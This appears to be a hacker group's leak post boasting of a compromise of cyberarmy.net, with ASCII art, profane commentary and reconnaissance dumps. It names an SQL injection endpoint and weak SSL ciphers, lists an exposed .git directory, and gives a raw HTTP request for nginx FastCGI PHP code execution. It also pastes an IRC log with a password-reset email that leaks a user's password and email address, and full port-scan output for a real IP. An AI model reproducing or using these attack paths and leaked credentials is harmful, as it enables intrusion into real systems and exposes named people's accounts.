#GameOver CyberArmy.net

1.  
2. MMMMMMMMMMM M MMMMMMMMMM MM MMMMMMMM$ MMMMMMMMM MMMMMMMMMMM
3. MMMMMMMMMMMMM MM =MMMMMMMMMM MM MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
4. MMMMMMM MMMMMMM MM MMMMMMMMMMM ~M MMMMMMMMM MMMMMMMMM MMMMMMMMMMM
5. MMMMMMM IMMMMMM :M MMMMMMMMMMM M MMMMMMMMM OMMMMMMMMM MMMMMMM
6. MMMMMMM IMMMMMM ,+ MMMMMMMMMMM7 M MMMMMMMMM MMMMMMMMMM MMMMMMM
7. MMMMMMM IMMMMMM MMMMMMMMMMMM = MMMMMMMMMMMMMMMMMMMM MMMMMMM
8. MMMMMMM M IMMMMM:MMMMMM ~ MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
9. MMMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM
10. MMMMMMMMMMMMMMM MMMMMM +MMMMM= MMMMMMMMMMMMM$MMMMMM MMMMMMMMMMM
11. MMMMMMM MMMMMM MMMMMM MMMMMM MMMMMM+MMMMMM MMMMMM MMMMMMM
12. MMMMMMM MMMMMM MMMMMMMMMMMMMM MMMMMM MMMMMM MMMMMM MMMMMMM
13. DDDDDDD DDDDDD ?DDDDDDDDDDDDDD DDDDDD DDDDDD DDDDDD DDDDDDD
14. 8888888 ~888888 888888888888888 888888 88888? 888888 88888888888
15. =OOOOOOOOOOOOOO OOOOOOO OOOOOOZ OOOOOO OOOOO OOOOOO OOOOOOOOOOO
16.  
17.  
18.  
19. NMMMMMN M ~IIIIII: IIIIIII IIIIIIIIIII IIIIIII= IIIIII
20. ~MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
21. MMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMMM MMMMMM
22. MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
23. MMMMMMM MMMMMMM MMMMMMM MMMMMM MMMMMMM MMMMMM MMMMMM OMMMMM
24. MMMMMMM MMMMMMM MMMMMM ~MMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
25. MMMMMMM MMMMMMM MMMMMM=OMMMMMM MMMMMMM MMMMMM ?MMMMMM MMMMMM
26. MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
27. MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMMMMM MMMMMM
28. MMMMMMM MMMMMMM =MMMMMMMMMMMM= MMMMMMMMMMM MMMMMM MMMMMM MMMMMM
29. MMMMMMM MMMMMMM MMMMMMMMMMMM MMMMMMM MMMMMM MMMMMM MMMMMM
30. NNNNNNN NNNNNNN NNNNNNNNNNNN NNNNNNN NNNNNN NNNNNN MNNNNN
31. DDDDDDD DDDDDDD DDDDDDDDDDDD DDDDDDD DDDDDD DDDDDD
32. 8888888 8888888 ?88888888888 88888888888 888888 888888 888888
33. OOOOOOOOOOOOO = OOOOOOOOOO, OOOOOOOOOOO OOOOOO OOOOOO OOOOOO
34. ZZZZZZZZZZZ . ZZZZZZZZZZ ZZZZZZZZZZZ ZZZZZZ ZZZZZZ ZZZZZ
35.  
36. ==============================================================================
37. Target : www.cyberarmy.net
38. ==============================================================================
39.  
40. [*]SQL
41.  
42. [+] Injection www.cyberarmy.net/mess/index.php?action=finishopenidlogin
43. [-] DB Null %
44.  
45. Fucking SQL Server With No Database!
46.  
47. [+]SSL Fucked
48.  
49. SSL_DES_64_CBC_WITH_MD5
50. SSL_RC2_128_CBC_EXPORT40_WITH_MD5
51. SSL_RC4_128_EXPORT40_WITH_MD5
52. TLS_DHE_RSA_WITH_DES_CBC_SHA
53. TLS_RSA_WITH_DES_CBC_SHA
54. TLS_RSA_DES_40_SHA
55. TLS_RSA_RC2_40_MD5
56. TLS_RSA_RC4_40_MD5
57.  
58. [*]Git Repository
59.  
60. $ cd /usr/local/www/public/mess/.git/
61. $ ls
62.  
63. .gitignore
64. COPYING
65. EVENTS.txt
66. Makefile
67. README
68. actions/accessadminpanel.php
69. actions/accesstoken.php
70. actions/all.php
71. actions/allrss.php
72. actions/apiaccountratelimitstatus.php
73. ...
74.  
75. [*]Nginx PHP code execution via FastCGI
76.  
77. GET /GameOver.txt/hacked.php HTTP/1.1
78. Cookie: PHPSESSID=5b68776ed8c3807c04116631346d8be2
79. Host: cyberarmy.net
80. Connection: Keep-alive
81. Accept-Encoding: gzip,deflate
82. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
83. Accept: */*
84. Content-Length: 6
85.  
86. www.cyberarmy.net/GameOver.txt/hacked.php
87.  
88. [*]IRC.CyberArmy.Net Fucked
89.  
90. eY3OwNYoUaLL fucked irc.cyberarmy.net
91.  
92. er1cbrux!efnet@icerslair.com> From: "CyberArmy"
93. er1cbrux!efnet@icerslair.com> <webmaster@cyberarmy.net>
94. er1cbrux!efnet@icerslair.com> To: "ViRsOveRiD"
95. er1cbrux!efnet@icerslair.com> <sirexar@crazy-horse.net>
96. er1cbrux!efnet@icerslair.com> Date: 28 Oct 2004, 01:09:30 PM
97. er1cbrux!efnet@icerslair.com> Subject: Password Successfully Reset
98. er1cbrux!efnet@icerslair.com> (virsoverid)
99. er1cbrux!efnet@icerslair.com>
100. er1cbrux!efnet@icerslair.com> ----------------------------------------
101. er1cbrux!efnet@icerslair.com> ---------------------------------------
102. er1cbrux!efnet@icerslair.com>
103. er1cbrux!efnet@icerslair.com> The following is an automated email from
104. er1cbrux!efnet@icerslair.com> CyberArmy.
105. er1cbrux!efnet@icerslair.com>
106. er1cbrux!efnet@icerslair.com> Hello,virsoverid
107. er1cbrux!efnet@icerslair.com> This is a confirmation that your
108. er1cbrux!efnet@icerslair.com> CyberArmy password
109. er1cbrux!efnet@icerslair.com> has been reset to: 19aHPxl6
110. er1cbrux!efnet@icerslair.com>
111. er1cbrux!efnet@icerslair.com> --
112.  
113. ==============================================================================
114. [+]Ports (Zues Botnet Hosted)
115.  
116. [*]22/tcp on 78.47.201.59
117.  
118. [*]25/tcp on 78.47.201.59
119.  
120. [*]80/tcp on 78.47.201.59
121.  
122. [*]443/tcp on 78.47.201.59
123.  
124. [*]53/tcp on 78.47.201.59
125.  
126. [*]9001/tcp on 78.47.201.59
127.  
128. citadel.cyberarmy.net
129.  
130. ------------------------------------------------------------------------------
131.  
132. 22/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
133.  
134. [*]ssh-hostkey: 1024 63:67:96:94:fd:65:b5:e0:f0:d8:d2:d3:ef:c9:8e:b8 (DSA)
135.  
136. [*]2048 ff:c2:0f:2a:24:62:3c:3d:88:cd:6f:bd:c1:c1:5e:0c (RSA)
137.  
138. ------------------------------------------------------------------------------
139.  
140. 25/tcp open smtp Sendmail 8.14.4/8.14.4
141.  
142. [*]smtp-commands: citadel.cyberarmy.net Hello [209.126.156.136], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
143.  
144. [*]2.0.0 This is sendmail version 8.14.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
145.  
146. ------------------------------------------------------------------------------
147.  
148. 53/tcp open domain ISC BIND 9.6.-ESV-R3
149.  
150. [*]dns-nsid:
151.  
152. [*]bind.version: 9.6.-ESV-R3
153.  
154. ------------------------------------------------------------------------------
155.  
156. 80/tcp open http nginx 1.0.4
157.  
158. [*]http-favicon: Unknown favicon MD5: B55D9F9D989F354D30F36BDBE863A43D
159.  
160. [*]http-methods: No Allow or Public header in OPTIONS response (status code 301)
161.  
162. [*]http-robots.txt: 2 disallowed entries
163.  
164. [*]/wiki/Special /wiki/index.php
165.  
166. [*]http-title: cyberarmy
167.  
168. [*]Requested resource was http://cyberarmy.net/
169.  
170. ------------------------------------------------------------------------------
171.  
172. 443/tcp open http nginx 1.0.4
173.  
174. [*]http-methods: No Allow or Public header in OPTIONS response (status code 400)
175.  
176. [*]http-title: 400 The plain HTTP request was sent to HTTPS port
177.  
178. [*]ssl-cert: Subject: commonName=cyberarmy.net
179.  
180. [*]Issuer: commonName=PositiveSSL CA/organizationName=Comodo CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
181.  
182. [*]Public Key type: rsa
183.  
184. [*]Public Key bits: 2048
185.  
186. [*]Not valid before: 2010-02-17T00:00:00+00:00
187.  
188. [*]Not valid after: 2011-02-17T23:59:59+00:00
189.  
190. [*]MD5: 687f 0fb1 c115 7c8e e9b4 e484 1d35 7c98
191.  
192. [*]SHA-1: 2ad7 17f9 64b4 0aa1 3299 5d2b 1aea 6900 2711 93f7
193.  
194. [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
195.  
196. [*]sslv2: server still supports SSLv2
197.  
198. ------------------------------------------------------------------------------
199.  
200. 9001/tcp open ssl/tor-orport?
201.  
202. [*]ssl-cert: Subject: commonName=www.ltfyd4rl5ma.net
203.  
204. [*]Issuer: commonName=www.4k56hozvhnjr35am5.net
205.  
206. [*]Public Key type: rsa
207.  
208. [*]Public Key bits: 1024
209.  
210. [*]Not valid before: 2013-01-08T08:24:25+00:00
211.  
212. [*]Not valid after: 2013-01-08T10:24:25+00:00
213.  
214. [*]MD5: 201a 82a0 1af8 d425 1196 dec2 b379 2f0d
215.  
216. [*]SHA-1: ff9c 11ce 8087 310c 24c5 9722 e1d2 48d8 54ed 0984
217.  
218. [*]ssl-date: 2013-01-08T08:57:51+00:00; +2s from local time.
219.  
220. ------------------------------------------------------------------------------
221.  
222. Zues Botnet Hosted On citadel.cyberarmy.net
223.  
224. [*]9090/tcp closed zeus-admin
225.  
226. [*]9091/tcp closed xmltec-xmlmail
227.  
228. ==============================================================================
229.  
230. [+]Operating System
231.  
232. Running: FreeBSD 7.X
233.  
234. OS CPE: cpe:/o:freebsd:freebsd:7
235.  
236. OS details: FreeBSD 7.1-PRERELEASE 7.2-STABLE, FreeBSD 7.2-RELEASE - 8.0-RELEASE
237.  
238. Uptime guess: 0.000 days (since Tue Jan 08 00:57:27 2013)
239.  
240. IP ID Sequence Generation: Busy server or unknown class
241.  
242. Service Info: OSs: FreeBSD, Unix; CPE: cpe:/o:freebsd:freebsd
243.  
244. ==============================================================================